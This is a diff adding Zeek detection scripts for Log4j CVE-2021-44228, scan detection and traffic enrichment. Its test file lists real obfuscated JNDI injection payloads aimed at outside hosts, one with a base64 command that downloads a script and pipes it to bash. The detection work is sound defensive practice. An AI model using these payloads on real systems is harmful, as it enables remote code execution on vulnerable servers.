+# Anchoring Java at ^, as have only seen sample attacks with this.
+global java_UA_pattern : pattern = /^Java\//;
+# Adding java-serialized-object out of caution. Unsure if it can be used, but have not seen legit use except with POST method 
+global java_mime_pattern_header: pattern = /java-vm|java-serialized-object/i;
+global java_mime_pattern_sniffed: pattern = /java-applet/;
+
+# The first check uses the Server's HTTP Content-Type header
+event http_header(c: connection, is_orig: bool, name: string, value: string)
+    {
+    if (!c$http?$method || (c$http?$method && c$http$method!="GET"))
+        return;
+    if (is_orig)
+        return;
+    if (c$http?$CVE_2021_44228_content_type)
+        return;
+    if (name == "CONTENT-TYPE" && java_mime_pattern_header in value)
+        {
+        c$http$CVE_2021_44228_content_type = value;
+        if (c$http?$user_agent && java_UA_pattern in c$http$user_agent)
+            {
+            c$http$CVE_2021_44228_detected = T;
+            add c$http$tags[LOG4J_RCE];
+            NOTICE([$note=LOG4J_JAVA_CLASS_DOWNLOAD,
+                    $conn=c,
+                    $identifier=cat(c$id$orig_h,c$id$orig_p,c$id$resp_h,c$id$resp_p),
+                    # $suppress_for=3600sec,
+                    $msg=fmt("Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type"),
+                    $sub=fmt("user_agent='%s', CONTENT-TYPE='%s', host='%s'", c$http$user_agent, c$http$CVE_2021_44228_content_type, split_string1(c$http$host, /:/)[0])]);
+            }
+        }
+    }
+
+# The second check uses the sniffed resp_mime_types, which can differ from the Server header.
+event http_message_done (c: connection, is_orig: bool, stat: http_message_stat)
+    {
+    if (c$http$trans_depth > 1)
+        return;
+    if (is_orig)
+        return;
+    if (!c$http?$resp_mime_types)
+        return;
+    # If we've already raised the notice via the Server's Content-Type header check, return
+    if (c$http$CVE_2021_44228_detected)
+        return;
+    if (c$http?$user_agent && java_UA_pattern !in c$http$user_agent)
+        return;
+    local resp_mime_types_string = join_string_vec(c$http$resp_mime_types, ",");
+    if (java_mime_pattern_sniffed in resp_mime_types_string)
+        {
+        local user_agent: string = "";
+        if (c$http?$user_agent)
+            user_agent = c$http$user_agent;
+
+        add c$http$tags[LOG4J_RCE];
+        NOTICE([$note=LOG4J_JAVA_CLASS_DOWNLOAD,
+                $conn=c,
+                $identifier=cat(c$id$orig_h,c$id$orig_p,c$id$resp_h,c$id$resp_p),
+                # $suppress_for=3600sec,
+                $msg=fmt("Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and resp_mime_types"),
+                $sub=fmt("user_agent='%s', resp_mime_types='%s'", user_agent, resp_mime_types_string)]);
+        }
+    }
--- a/capitalone/detect/log4j/LICENSE
+++ b/capitalone/detect/log4j/LICENSE
@ -0,0 +1,29 @@
+Copyright (c) 2021, Corelight, Inc. All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are
+met:
+
+(1) Redistributions of source code must retain the above copyright
+    notice, this list of conditions and the following disclaimer.
+
+(2) Redistributions in binary form must reproduce the above copyright
+    notice, this list of conditions and the following disclaimer in
+    the documentation and/or other materials provided with the
+    distribution.
+
+(3) Neither the name of Corelight nor the names of any contributors
+    may be used to endorse or promote products derived from this
+    software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
--- a/capitalone/detect/log4j/load.zeek
+++ b/capitalone/detect/log4j/load.zeek
@ -0,0 +1,3 @@
+@load ./CVE_2021_44228.zeek
+@load ./CVE_2021_44228_java_GET.zeek
+@load ./tests.zeek
--- a/capitalone/detect/log4j/ldap_java.sig
+++ b/capitalone/detect/log4j/ldap_java.sig
@ -0,0 +1,23 @@
+signature ldap_client_udp {
+  ip-proto == udp
+  payload /^\x30.\x02\x01.\x60/
+}
+
+signature log4j_javaclassname_udp {
+  ip-proto == udp
+  payload /^\x30.*javaClassName/
+  requires-reverse-signature ldap_client_udp
+  event "log4j_javaclassname_udp"
+}
+
+signature ldap_client_tcp {
+  ip-proto == tcp
+  payload /^\x30.\x02\x01.\x60/
+}
+
+signature log4j_javaclassname_tcp {
+  ip-proto == tcp
+  payload /^\x30.*javaClassName/
+  requires-reverse-signature ldap_client_tcp
+  event "log4j_javaclassname_tcp"
+}
--- a/capitalone/detect/log4j/tests.zeek
+++ b/capitalone/detect/log4j/tests.zeek
@ -0,0 +1,82 @@
+module CVE_2021_44228;
+
+type TestCase: record {
+    s: string;
+    matches: bool;
+    norm_s: string;
+    pp: PayloadParts;
+    };
+
+function make_test_case(s: string, matches: bool, norm_s: string, uri: string, stem: string, host: string, port_: string): TestCase
+    {
+    local pp = PayloadParts($uri=uri, $stem=stem, $host=host, $port_=port_);
+    return TestCase($s=s, $matches=matches, $norm_s=norm_s, $pp=pp);
+    }
+
+function payload_equals(p1: PayloadParts, p2: PayloadParts): bool
+    {
+    return p1$uri == p2$uri && p1$stem == p2$stem && p1$host == p2$host && p1$port_ == p2$port_;
+    }
+
+event zeek_init()
+    {
+    if ( run_tests )
+        {
+        # TODO: Change these to use the table drive tests strategy with `TestCase`
+        print(exploit_pattern in "https://ad.doubleclick.net/ddm/ad/N5631.507083IPINYOU.COM/B26871807.320905003;sz=1x1;ord=16396029064475833;dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}?" == F);
+        print(exploit_pattern in "/index.php?s=/module/action/param1/${@Die(md5(HelloThinkPHP))}" == F);
+        print(exploit_pattern in "/index?s=index/\think\Module/Action/Param/${@phpinfo()}" == F);
+        print(exploit_pattern in "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}" == T);
+        print(exploit_pattern in "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}" == T);
+        print(exploit_pattern in "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=" == T);
+        print(exploit_pattern in "https://foobarstuff.wiz.biz=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}" == F);
+        print(normalize("${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=") == "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=");
+        print(normalize("${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}") == "${jndi:ldap://world80.log4j.binaryedge.io:80/ callback}");
+        print(normalize("${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}") == "${jndi:ldap://45.146.164.160:1389/t}");
+        print(normalize("${jndi:${lower:l${lower:d${lower:a${lower:p}}}}://foo.bar/baz}") == "${jndi:ldap://foo.bar/baz}");
+
+        local empty_str_vector: vector of string;
+        push("1");
+        print(stack == vector("1"));
+        push("2");
+        print(stack == vector("1", "2"));
+        push("3");
+        print(stack == vector("1", "2", "3"));
+        print(peek() == "3");
+        print(pop() == "3");
+        print(peek() == "2");
+        print(pop() == "2");
+        print(peek() == "1");
+        print(pop() == "1");
+        print(peek() == "");
+        print(pop() == "");
+        push("1");
+        push("2");
+        push("3");
+        print(stack == vector("1", "2", "3"));
+        clear_stack();
+        print(stack == empty_str_vector);
+
+        local test_cases: vector of TestCase;
+        test_cases += make_test_case("${${vgld:jfhv:zyh:c:tvrit:-j}${odm:t:stfd:vaxokx:qanuv:-n}${ufsgjh:tpr:wqlb:-d}${ohq:yyw:ovptvo:ftzg:bemff:-i}:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou}", T, "${jfhv:zyh:c:tvrit:-jt:stfd:vaxokx:qanuv:-ntpr:wqlb:-dyyw:ovptvo:ftzg:bemff:-i:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou}", "6pe015373099ca36cc511d.y.psc3evgl.cou", "6pe015373099ca36cc511d.y.psc3evgl.cou", "6pe015373099ca36cc511d.y.psc3evgl.cou", "-");
+        test_cases += make_test_case("${jndi:corbal://0.17.149.63:30123/xvalystgst}", T, "${jndi:corbal://0.17.149.63:30123/xvalystgst}", "0.17.149.63:30123/xvalystgst", "0.17.149.63:30123", "0.17.149.63", "30123");
+        test_cases += make_test_case("${jndi:dns://9-99-149-125.example.net/va}", T, "${jndi:dns://9-99-149-125.example.net/va}", "9-99-149-125.example.net/va", "9-99-149-125.example.net", "9-99-149-125.example.net", "-");
+        test_cases += make_test_case("${jndi:http://0.8.149.07:30871/xvalystgst}", T, "${jndi:http://0.8.149.07:30871/xvalystgst}", "0.8.149.07:30871/xvalystgst", "0.8.149.07:30871", "0.8.149.07", "30871");
+        test_cases += make_test_case("${jndi:iiop://0.96.149.90:08425/xvalystgst}", T, "${jndi:iiop://0.96.149.90:08425/xvalystgst}", "0.96.149.90:08425/xvalystgst", "0.96.149.90:08425", "0.96.149.90", "08425");
+        test_cases += make_test_case("${jndi:ldap://.gf8.rv/mmm}", T, "${jndi:ldap://.gf8.rv/mmm}", ".gf8.rv/mmm", ".gf8.rv", ".gf8.rv", "-");
+        test_cases += make_test_case("${jndi:ldap://dvuuy_hostnaug./a}", T, "${jndi:ldap://dvuuy_hostnaug./a}", "dvuuy_hostnaug./a", "dvuuy_hostnaug.", "dvuuy_hostnaug.", "-");
+        test_cases += make_test_case("${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class}", T, "${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class}", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou", "-");
+        test_cases += make_test_case("${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a}", T, "${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a}", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml", "-");
+        test_cases += make_test_case("${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk}", T, "${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk}", "pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk", "pqn.ae:1954", "pqn.ae", "1954");
+        test_cases += make_test_case("${jndi:loqgrn${loqgr:s}://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co}", T, "${jndi:loqgrns://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co}", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "-");
+        test_cases += make_test_case("${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-di${gnk:gnk_naug:-:}${gnk:gnk_naug:-l}d${gnk:gnk_naug:-a}p${gnk:gnk_naug:-:}//30.137.173.178:5851/q ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t", T, "${loqgrndi:ldap://30.137.173.178:1954/t} ndi:ldap://30.137.173.178:1954/t} ndi:ldap://30.137.173.178:1954/t} j}n}d}i}:l}d}a}p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-dignk_naug:-:}gnk_naug:-l}dgnk_naug:-a}pgnk_naug:-:}//30.137.173.178:5851/q ndi:ldap://30.137.173.178:1954/t} j}n}d}i}:l}d}a}p}://30.137.173.178:1954/t", "30.137.173.178:1954/t", "30.137.173.178:1954", "30.137.173.178", "1954");
+
+        for ( i in test_cases )
+            {
+            print(test_cases[i]$s);
+            print(exploit_pattern in test_cases[i]$s == test_cases[i]$matches);
+            print(normalize(test_cases[i]$s) == test_cases[i]$norm_s);
+            print(payload_equals(parse_payload(test_cases[i]$s), test_cases[i]$pp));
+            }
+        }
+    }
--- a/capitalone/detect/main.zeek
+++ b/capitalone/detect/main.zeek
@ -0,0 +1,6 @@
+@load ./LIBSSH_CVE_2018_10933.zeek
+@load ./RDP_CVE_2019_0708.zeek
+# Detection for log4j 0-day
+# @load ./CVE_2021_44228.zeek
+@load ./log4j
+# @load ./scan
--- a/capitalone/detect/scan.zeek
+++ b/capitalone/detect/scan.zeek
@ -0,0 +1,337 @@
+##! TCP Scan detection.
+
+# ..Authors: Justin Azoff
+#            All the authors of the old scan.bro
+
+@load base/frameworks/notice
+
+@load base/utils/time
+
+@ifndef(Site::darknet_mode)
+@load ./bro-is-darknet
+@endif
+
+module Scan;
+
+export {
+    redef enum Notice::Type += {
+        ## Address scans detect that a host appears to be scanning some
+        ## number of destinations on a single port. This notice is
+        ## generated when more than :bro:id:`Scan::scan_threshold`
+        ## unique hosts are seen over the previous
+        ## :bro:id:`Scan::scan_interval` time range.
+        Address_Scan,
+
+        ## Port scans detect that an attacking host appears to be
+        ## scanning a single victim host on several ports.  This notice
+        ## is generated when an attacking host attempts to connect to
+        ## :bro:id:`Scan::scan_threshold`
+        ## unique ports on a single host over the previous
+        ## :bro:id:`Scan::scan_interval` time range.
+        Port_Scan,
+
+        ## Random scans detect that an attacking host appears to be
+        ## scanning multiple victim hosts on several ports.  This notice
+        ## is generated when an attacking host attempts to connect to
+        ## :bro:id:`Scan::scan_threshold`
+        ## unique hosts and ports over the previous
+        ## :bro:id:`Scan::scan_interval` time range.
+        Random_Scan,
+    };
+
+    ## An individual scan destination
+    type Attempt: record {
+        victim: addr;
+        scanned_port: port;
+    };
+
+    ## Information tracked for each scanner
+    type Scan_Info: record {
+        first_seen: time;
+        attempts: set[Attempt];
+        port_counts: table[port] of count;
+        dark_hosts: set[addr];
+    };
+
+    ## Failed connection attempts are tracked until not seen for this interval.
+    ## A higher interval will detect slower scanners, but may also yield more
+    ## false positives.
+    const scan_timeout = 15min &redef;
+
+    ## The threshold of the number of darknet hosts a scanning host has to have
+    ## scanned in order for the scan to be considered a darknet scan
+    const dark_host_threshold = 3 &redef;
+
+    ## The threshold of the unique number of host+ports a remote scanning host
+    ## has to have failed connections with
+    const scan_threshold = 25 &redef;
+
+    ## The threshold of the unique number of host+ports a local scanning host
+    ## has to have failed connections with
+    const local_scan_threshold = 250 &redef;
+
+    ## The threshold of the unique number of host+ports a remote scanning host
+    ## has to have failed connections with if it has passed dark_host_threshold
+    const scan_threshold_with_darknet_hits = 10 &redef;
+
+    ## The threshold of the unique number of host+ports a local scanning host
+    ## has to have failed connections with if it has passed dark_host_threshold
+    const local_scan_threshold_with_darknet_hits = 100 &redef;
+
+    ## The threshold of the number of unique hosts a remote scanning host has
+    ## to have failed connections with
+    const knockknock_threshold                   = 20 &redef;
+
+    ## The threshold of the number of unique hosts a remote scanning host has
+    ## to have failed connections with if it has passed dark_host_threshold
+    const knockknock_threshold_with_darknet_hits = 3  &redef;
+
+    ## Override this hook to ignore particular scan connections
+    global Scan::scan_policy: hook(scanner: addr, victim: addr, scanned_port: port);
+
+
+    global scan_attempt: event(scanner: addr, attempt: Attempt);
+    global attacks: table[addr] of Scan_Info &read_expire=scan_timeout &redef;
+    global recent_scan_attempts: table[addr] of set[Attempt] &create_expire=1mins;
+
+    global adjust_known_scanner_expiration: function(s: table[addr] of interval, idx: addr): interval;
+    global known_scanners: table[addr] of interval &create_expire=10secs &expire_func=adjust_known_scanner_expiration;
+}
+
+# There's no way to set a key to expire at a specific time, so we
+# First set the keys value to the duration we want, and then
+# use expire_func to adjust it to the desired time.
+event Notice::begin_suppression(ts: time, suppress_for: interval, note: Notice::Type, identifier: string)
+    {
+        if (note == Address_Scan || note == Random_Scan || note == Port_Scan)
+        {
+            local src = to_addr(identifier);
+            known_scanners[src] = suppress_for;
+            delete recent_scan_attempts[src];
+        }
+    }
+
+function adjust_known_scanner_expiration(s: table[addr] of interval, idx: addr): interval
+{
+    local duration = s[idx];
+    s[idx] = 0secs;
+    return duration;
+}
+
+@if ( !Cluster::is_enabled() || Cluster::local_node_type() != Cluster::WORKER )
+function analyze_unique_hostports(attempts: set[Attempt]): Notice::Info
+{
+    local ports: set[port];
+    local victims: set[addr];
+
+    local ports_str: set[string];
+    local victims_str: set[string];
+
+    for ( a in attempts )
+        {
+        add victims[a$victim];
+        add ports[a$scanned_port];
+
+        add victims_str[cat(a$victim)];
+        add ports_str[cat(a$scanned_port)];
+        }
+    
+    if(|ports| == 1)
+        {
+        #Extract the single port
+        for (p in ports)
+            {
+            return [$note=Address_Scan, $msg=fmt("%s unique hosts on port %s", |victims|, p), $p=p];
+            }
+        }
+    if(|victims| == 1)
+        {
+        #Extract the single victim
+        for (v in victims)
+            return [$note=Port_Scan, $msg=fmt("%s unique ports on host %s", |ports|, v)];
+        }
+    if(|ports| <= 5)
+        {
+        local ports_string = join_string_set(ports_str, ", ");
+        return [$note=Address_Scan, $msg=fmt("%s unique hosts on ports %s", |victims|, ports_string)];
+        }
+    if(|victims| <= 5)
+        {
+        local victims_string = join_string_set(victims_str, ", ");
+        return [$note=Port_Scan, $msg=fmt("%s unique ports on hosts %s", |ports|, victims_string)];
+        }
+    return [$note=Random_Scan, $msg=fmt("%d hosts on %d ports", |victims|, |ports|)];
+}
+
+function generate_notice(scanner: addr, si: Scan_Info): Notice::Info
+    {
+    local side = Site::is_local_addr(scanner) ? "local" : "remote";
+    local dur = duration_to_mins_secs(network_time() - si$first_seen);
+    local n = analyze_unique_hostports(si$attempts);
+    n$msg = fmt("%s scanned at least %s in %s", scanner, n$msg, dur);
+    n$src = scanner;
+    n$sub = side;
+    n$identifier=cat(scanner);
+    return n;
+    }
+
+function add_scan_attempt(scanner: addr, attempt: Attempt)
+    {
+    # If this is a recent scanner, do nothing
+    if ( scanner in known_scanners )
+        return;
+
+    local si: Scan_Info;
+    local attempts: set[Attempt];
+    local dark_hosts: set[addr];
+    local port_counts: table[port] of count;
+
+    # Accounting
+    if ( scanner !in attacks)
+        {
+        attempts = set();
+        port_counts = table();
+        dark_hosts = set();
+        si = Scan_Info($first_seen=network_time(), $attempts=attempts, $port_counts=port_counts, $dark_hosts=dark_hosts);
+        attacks[scanner] = si;
+        }
+    else
+        {
+        si = attacks[scanner];
+        attempts = si$attempts;
+        port_counts = si$port_counts;
+        dark_hosts = si$dark_hosts;
+        }
+    
+    if ( attempt in attempts )
+        return;
+    
+    add attempts[attempt];
+    if (attempt$scanned_port !in port_counts)
+        port_counts[attempt$scanned_port] = 1;
+    else
+        ++port_counts[attempt$scanned_port];
+
+    # See if we need more dark hosts, otherwise add the new one if we can
+    if(|dark_hosts| < dark_host_threshold && attempt$victim !in dark_hosts && Site::is_darknet(attempt$victim)) {
+        add dark_hosts[attempt$victim];
+    }
+    # End of accounting
+
+    # Determine thresholds and if they were crossed
+    local thresh: count;
+    local is_local = Site::is_local_addr(scanner);
+
+    local is_darknet_scan = |dark_hosts| >= dark_host_threshold;
+
+    if ( is_darknet_scan )
+        thresh = is_local ? local_scan_threshold_with_darknet_hits : scan_threshold_with_darknet_hits;
+    else
+        thresh = is_local ? local_scan_threshold : scan_threshold;
+    
+    local is_scan = |attempts| >= thresh;
+    local is_knockkock = F;
+    if ( !is_local )
+        {
+        local knock_thresh = is_darknet_scan ? knockknock_threshold_with_darknet_hits : knockknock_threshold;
+        # This should probably check all port counts if is_darknet_scan
+        is_knockkock = port_counts[attempt$scanned_port] >= knock_thresh;
+        }
+
+    #The above 17 lines needs to be factored out into functions/hooks/something plugable.
+    if ( is_scan || is_knockkock)
+        {
+        local note = generate_notice(scanner, si);
+        if ( is_knockkock )
+            note$msg = fmt("kk: %s", note$msg);
+        NOTICE(note);
+        delete attacks[scanner];
+        known_scanners[scanner] = 1hrs;
+        }
+    }
+@endif
+
+@if ( Cluster::is_enabled() )
+######################################
+# Cluster mode
+@ifdef (Cluster::worker2manager_events)
+   redef Cluster::worker2manager_events += /Scan::scan_attempt/;
+@endif
+
+function add_scan(id: conn_id)
+    {
+    local scanner      = id$orig_h;
+    local victim       = id$resp_h;
+    local scanned_port = id$resp_p;
+
+    # If this is a recent scanner, do nothing
+    if ( scanner in known_scanners )
+        return;
+
+    if ( hook Scan::scan_policy(scanner, victim, scanned_port) )
+        {
+        local attempt = Attempt($victim=victim, $scanned_port=scanned_port);
+        if ( scanner !in recent_scan_attempts)
+            recent_scan_attempts[scanner] = set();
+        if ( attempt in recent_scan_attempts[scanner] )
+            return;
+        add recent_scan_attempts[scanner][attempt];
+@ifdef (Cluster::worker2manager_events)
+        event Scan::scan_attempt(scanner, attempt);
+@else
+        Cluster::publish_hrw(Cluster::proxy_pool, scanner, Scan::scan_attempt, scanner, attempt);
+@endif
+
+        # Check to see if we have already sent enough attempts
+        # this is mostly reduntant due to the notice begin_suppression event
+        local thresh = Site::is_local_addr(scanner) ? local_scan_threshold : scan_threshold;
+        if ( |recent_scan_attempts[scanner]| >= thresh )
+            {
+                known_scanners[scanner] = 1hrs;
+                delete recent_scan_attempts[scanner];
+            }
+        }
+    }
+
+@if ( Cluster::local_node_type() != Cluster::WORKER )
+event Scan::scan_attempt(scanner: addr, attempt: Attempt)
+    {
+    add_scan_attempt(scanner, attempt);
+    }
+@endif
+######################################
+
+@else
+######################################
+# Standalone mode
+function add_scan(id: conn_id)
+    {
+    local scanner      = id$orig_h;
+    local victim       = id$resp_h;
+    local scanned_port = id$resp_p;
+
+    if ( hook Scan::scan_policy(scanner, victim, scanned_port) )
+        {
+        add_scan_attempt(scanner, Attempt($victim=victim, $scanned_port=scanned_port));
+        }
+    }
+@endif
+######################################
+
+event connection_attempt(c: connection)
+    {
+    if ( c$history == "S" || c$history == "SW")
+        add_scan(c$id);
+    }
+
+event connection_rejected(c: connection)
+    {
+    if ( c$history == "Sr" || c$history == "SWr")
+        add_scan(c$id);
+    }
+
+#event connection_reset(c: connection)
+#   {
+#   if ( c$history == "ShR" )
+#       add_scan(c$id);
+#   }
--- a/capitalone/enrichments/load.zeek
+++ b/capitalone/enrichments/load.zeek
@ -0,0 +1,7 @@
+@load ./addtl_ssl_certs
+@load ./mozilla-ca-list-11-14-2018
+@load ./addtl_smb
+@load ./smb_beacon.zeek
+@load /zeek/share/zeek/policy/protocols/krb/ticket-logging.zeek
+@load ./geoip-conn.zeek
+@load ./asn-conn.zeek
--- a/capitalone/enrichments/addtl_smb.zeek
+++ b/capitalone/enrichments/addtl_smb.zeek
@ -0,0 +1,3 @@
+redef SMB::logged_file_actions += {
+    SMB::PIPE_OPEN,
+};
--- a/capitalone/enrichments/addtl_ssl_certs.zeek
+++ b/capitalone/enrichments/addtl_ssl_certs.zeek
@ -0,0 +1,8 @@
+
+# Who               When            What
+# -----------------------------------------------------------------------------
+# Aaron Eppert      11/14/2018      Adding CapitalOne's Self-Signed Certificate
+#
+redef SSL::root_certs += {
+    ["CN=CRL1,O=Capital One,C=US"] = "\x30\x82\x02\xBF\x30\x82\x02\x28\xA0\x03\x02\x01\x02\x02\x04\x37\xB1\xA9\xCE\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x01\x05\x05\x00\x30\x23\x31\x0B\x30\x09\x06\x03\x55\x04\x06\x13\x02\x55\x53\x31\x14\x30\x12\x06\x03\x55\x04\x0A\x13\x0B\x43\x61\x70\x69\x74\x61\x6C\x20\x4F\x6E\x65\x30\x1E\x17\x0D\x39\x39\x30\x38\x31\x31\x31\x36\x32\x30\x32\x33\x5A\x17\x0D\x31\x39\x30\x38\x31\x31\x31\x36\x35\x30\x32\x33\x5A\x30\x23\x31\x0B\x30\x09\x06\x03\x55\x04\x06\x13\x02\x55\x53\x31\x14\x30\x12\x06\x03\x55\x04\x0A\x13\x0B\x43\x61\x70\x69\x74\x61\x6C\x20\x4F\x6E\x65\x30\x81\x9D\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x01\x01\x05\x00\x03\x81\x8B\x00\x30\x81\x87\x02\x81\x81\x00\xDF\xF9\xA8\x14\x71\x2D\x12\x89\x4B\xAF\x1C\xF8\x23\xEE\x09\xB9\xA8\x02\x4A\x0C\xB1\x09\x99\xFB\x19\x7F\xBC\xF1\x9C\xD4\x37\x7E\xE4\x47\x1D\x33\xDF\x6D\xF6\x2B\xBB\x2B\x81\x82\x9C\xC2\x20\x95\xCD\xBE\x66\x3D\x71\x89\xAF\x31\x8E\xF0\xA1\xF5\x4C\x77\x98\x4E\x52\x09\xAD\x00\x42\x88\xF9\xF7\xC2\x08\xF4\x62\xC3\xA2\x81\x3C\x47\xC0\x3D\x09\x91\xC3\x82\x1D\x4E\xF6\x0B\xBB\x6C\x1E\x0E\x5E\xA2\xAE\x49\x34\xC6\x4C\xA5\x8F\xD3\x1B\xA4\xAF\xE1\x0A\xB2\xE3\x40\x15\xDB\x64\x5D\xCC\x10\xE6\x56\x80\xF2\x65\xF9\x34\xA1\xDD\x02\x01\x03\xA3\x82\x01\x00\x30\x81\xFD\x30\x11\x06\x09\x60\x86\x48\x01\x86\xF8\x42\x01\x01\x04\x04\x03\x02\x00\x07\x30\x45\x06\x03\x55\x1D\x1F\x04\x3E\x30\x3C\x30\x3A\xA0\x38\xA0\x36\xA4\x34\x30\x32\x31\x0B\x30\x09\x06\x03\x55\x04\x06\x13\x02\x55\x53\x31\x14\x30\x12\x06\x03\x55\x04\x0A\x13\x0B\x43\x61\x70\x69\x74\x61\x6C\x20\x4F\x6E\x65\x31\x0D\x30\x0B\x06\x03\x55\x04\x03\x13\x04\x43\x52\x4C\x31\x30\x2B\x06\x03\x55\x1D\x10\x04\x24\x30\x22\x80\x0F\x31\x39\x39\x39\x30\x38\x31\x31\x31\x36\x32\x30\x32\x33\x5A\x81\x0F\x32\x30\x31\x39\x30\x38\x31\x31\x31\x36\x32\x30\x32\x33\x5A\x30\x0B\x06\x03\x55\x1D\x0F\x04\x04\x03\x02\x01\x06\x30\x1F\x06\x03\x55\x1D\x23\x04\x18\x30\x16\x80\x14\xFA\xB2\x3E\x1B\x42\x6F\xF5\x5E\xAB\xFA\xEE\xAD\x1D\x5E\x85\x8B\xEA\xB0\xB2\xC6\x30\x1D\x06\x03\x55\x1D\x0E\x04\x16\x04\x14\xFA\xB2\x3E\x1B\x42\x6F\xF5